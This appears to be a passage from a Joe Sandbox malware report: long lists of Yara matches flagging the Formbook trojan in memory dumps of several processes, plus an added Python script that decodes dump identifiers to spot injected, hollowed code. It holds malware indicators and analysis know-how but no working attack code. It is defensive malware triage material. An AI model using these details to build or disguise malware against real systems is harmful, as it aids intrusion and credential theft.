Source: Yara match | File source: 0000001B.00000003.1916791732.00000000019B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000003.1785668153.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.1995504017.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000003.1778617142.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.1690629152.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000003.1784873248.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000003.1632049860.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.1824428727.0000000000950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000003.1633788753.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000003.1631481618.0000000001018000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.1996380159.000000000166A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000003.1632478090.0000000001030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000003.1913693018.0000000001A3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000003.1633303654.0000000003827000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.1995598062.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000003.1914595785.0000000001A11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000003.1632707847.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000020.00000002.1954404710.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.1993881319.000000000166B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000003.1779404808.0000000000E42000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000002.1954501729.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.1995831269.000000000163D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.1994589968.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000003.1914843943.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000003.1778666606.0000000000E06000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000003.1785086182.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000003.1632126525.0000000001062000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000003.1917367387.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1666060455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.1993929850.0000000001699000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000003.1914324145.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.2628367776.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000003.1913627559.0000000001A0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.2628964763.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
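Added triage helper, not part of the Joe Sandbox report: it decodes the *.sdmp identifiers in the Yara-match list above and flags the hits that sit in executable memory which is not a loaded image, the shape of injected or hollowed code. Joe Sandbox does not document the naming scheme, so the field meanings (process index in hex, dump phase, dump id, base address, page protection, two undecoded fields around the MEM_* region type) are an assumption based on how the names in this report line up with winnt.h constants and with "15.2.RegSvcs.exe.400000.0.raw.unpack"; the process-name table only covers indices this report itself names.

```python
"""Decode Joe Sandbox *.sdmp identifiers and rank Yara hits for a first look.

Assumed layout (not documented by Joe Sandbox; inferred from this report):
    <proc index hex>.<phase>.<dump id>.<base>.<protect>.<?>.<MEM_* type>.<?>.sdmp
Phase is read as 0 = start of analysis, 2 = end of analysis, 3 = during run.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Tuple

# winnt.h page-protection constants (low byte of the protect field).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_IMAGE = 0x1000000
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", MEM_IMAGE: "MEM_IMAGE"}

DUMP_RE = re.compile(
    r"(?P<proc>[0-9A-Fa-f]{8})\.(?P<phase>[0-9A-Fa-f]{8})\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\."
    r"(?P<mtype>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.sdmp"
)


@dataclass(frozen=True)
class DumpRegion:
    process_index: int   # 0x0F here is the "15" in 15.2.RegSvcs.exe.400000.0.raw.unpack
    phase: int
    base: int
    protect: int
    mem_type: int

    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:x}")

    def mem_type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:x}")

    def is_executable(self) -> bool:
        return bool(self.protect & 0xF0)   # any PAGE_EXECUTE* value

    def is_writable(self) -> bool:
        return bool(self.protect & 0xCC)   # READWRITE, WRITECOPY and their EXECUTE forms

    def is_suspicious(self) -> bool:
        """Executable memory that did not come from a mapped image. The hollowed
        RegSvcs.exe body at 0x400000 above is PAGE_EXECUTE_READWRITE + MEM_PRIVATE."""
        return self.is_executable() and self.mem_type != MEM_IMAGE

    def describe(self, process_names: Dict[int, str]) -> str:
        name = process_names.get(self.process_index, "?")
        return (f"{name} (#{self.process_index}) base=0x{self.base:x} "
                f"{self.protect_name()} {self.mem_type_name()} phase={self.phase}")


def parse_dump_name(text: str) -> Optional[DumpRegion]:
    """Return the first *.sdmp identifier found in a report line, or None."""
    m = DUMP_RE.search(text)
    if m is None:
        return None
    return DumpRegion(process_index=int(m["proc"], 16), phase=int(m["phase"], 16),
                      base=int(m["base"], 16), protect=int(m["protect"], 16),
                      mem_type=int(m["mtype"], 16))


def triage(lines: Iterable[str]) -> Tuple[Dict[int, List[DumpRegion]], List[DumpRegion]]:
    """Group hits by process index and collect the executable non-image ones."""
    by_process: Dict[int, List[DumpRegion]] = defaultdict(list)
    suspicious: List[DumpRegion] = []
    for line in lines:
        region = parse_dump_name(line)
        if region is None:          # e.g. the *.unpack entries carry no sdmp name
            continue
        by_process[region.process_index].append(region)
        if region.is_suspicious():
            suspicious.append(region)
    return dict(by_process), suspicious


# Process names as this report attributes them; other indices are not named on this page.
PROCESS_NAMES = {0x00: "M1Y6kc9FpE.exe", 0x08: "oxhvi.msc", 0x0F: "RegSvcs.exe",
                 0x11: "explorer.exe", 0x16: "oxhvi.msc.exe"}

# Constructed sample: a handful of the Yara-match lines from the list above.
SAMPLE_LINES = [
    "Source: Yara match | File source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE",
    "Source: Yara match | File source: 0000000F.00000002.1666060455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY",
    "Source: Yara match | File source: 00000008.00000003.1632670112.0000000001030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY",
    "Source: Yara match | File source: 00000013.00000002.1690629152.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY",
    "Source: Yara match | File source: 0000001B.00000003.1914895579.0000000001A12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY",
    "Source: Yara match | File source: 00000012.00000002.2628964763.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY",
]

if __name__ == "__main__":
    grouped, flagged = triage(SAMPLE_LINES)
    for idx in sorted(grouped):
        print(f"process #{idx}: {len(grouped[idx])} hit(s)")
    for region in flagged:
        print("look first:", region.describe(PROCESS_NAMES))
```

On the sample the two regions that come out first are the RWX private block at 0x400000 in RegSvcs.exe (process 15) and an RWX mapped section in process 19; the PAGE_READWRITE private hits in processes 8, 27 and 18 are heap-type memory where the rule also fired and are worth a second pass but not the first. Mapping the unnamed indices to binaries needs the process tree from the full report, which this page does not carry.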

              System Summary

Source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.2628887806.0000000002A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000012.00000002.2628887806.0000000002A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.2628887806.0000000002A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000022.00000003.1994918677.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000022.00000003.1994918677.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000022.00000003.1994918677.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000003.1632670112.0000000001030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000003.1632670112.0000000001030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000003.1632670112.0000000001030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000003.1778571483.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000016.00000003.1778571483.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000003.1778571483.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000022.00000003.1994440354.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000022.00000003.1994440354.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000022.00000003.1994440354.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000003.1784873248.0000000000E34000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000016.00000003.1784873248.0000000000E34000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000003.1784873248.0000000000E34000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000025.00000002.2032446289.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000025.00000002.2032446289.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000025.00000002.2032446289.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000003.1781279846.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000016.00000003.1781279846.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000003.1781279846.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000003.1914895579.0000000001A12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001B.00000003.1914895579.0000000001A12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000003.1914895579.0000000001A12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000022.00000003.1993986799.00000000016C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000022.00000003.1993986799.00000000016C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000022.00000003.1993986799.00000000016C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000003.1779088648.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000016.00000003.1779088648.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000003.1779088648.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000003.1917625527.00000000019DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001B.00000003.1917625527.00000000019DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000003.1917625527.00000000019DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000022.00000003.1995504017.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000022.00000003.1995504017.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000022.00000003.1995504017.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000016.00000003.1785265319.000000000378C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000016.00000003.1785265319.000000000378C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000016.00000003.1785265319.000000000378C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000016.00000003.1779323188.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000016.00000003.1779323188.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000016.00000003.1779323188.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000016.00000003.1785169179.0000000000D7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000016.00000003.1785169179.0000000000D7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000016.00000003.1785169179.0000000000D7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000008.00000003.1633266545.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000008.00000003.1633266545.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000008.00000003.1633266545.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0000001B.00000003.1913572826.00000000019E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000001B.00000003.1913572826.00000000019E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0000001B.00000003.1913572826.00000000019E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000022.00000003.1995901696.0000000004154000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000022.00000003.1995901696.0000000004154000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000022.00000003.1995901696.0000000004154000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0000001A.00000002.1823176871.0000000000FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000001A.00000002.1823176871.0000000000FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0000001A.00000002.1823176871.0000000000FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000008.00000003.1631433911.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000008.00000003.1631433911.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000008.00000003.1631433911.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000008.00000003.1631393564.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000008.00000003.1631393564.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000008.00000003.1631393564.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000022.00000003.1994684726.000000000170D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000022.00000003.1994684726.000000000170D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000022.00000003.1994684726.000000000170D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000011.00000002.2649074855.0000000010EA2000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
              Source: 00000008.00000003.1632049860.000000000102C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000008.00000003.1632049860.000000000102C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000008.00000003.1632049860.000000000102C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0000001B.00000003.1916791732.00000000019B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000001B.00000003.1916791732.00000000019B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0000001B.00000003.1916791732.00000000019B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000016.00000003.1785668153.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000016.00000003.1785668153.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000016.00000003.1785668153.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000022.00000003.1995504017.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000022.00000003.1995504017.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000022.00000003.1995504017.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000016.00000003.1778617142.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000016.00000003.1778617142.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000016.00000003.1778617142.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000013.00000002.1690629152.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000013.00000002.1690629152.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000013.00000002.1690629152.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000016.00000003.1784873248.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000016.00000003.1784873248.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000016.00000003.1784873248.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000008.00000003.1632049860.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000008.00000003.1632049860.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000008.00000003.1632049860.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000019.00000002.1824428727.0000000000950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000019.00000002.1824428727.0000000000950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000019.00000002.1824428727.0000000000950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000008.00000003.1633788753.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000008.00000003.1633788753.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000008.00000003.1633788753.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000008.00000003.1631481618.0000000001018000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000008.00000003.1631481618.0000000001018000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000008.00000003.1631481618.0000000001018000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000022.00000003.1996380159.000000000166A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000022.00000003.1996380159.000000000166A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
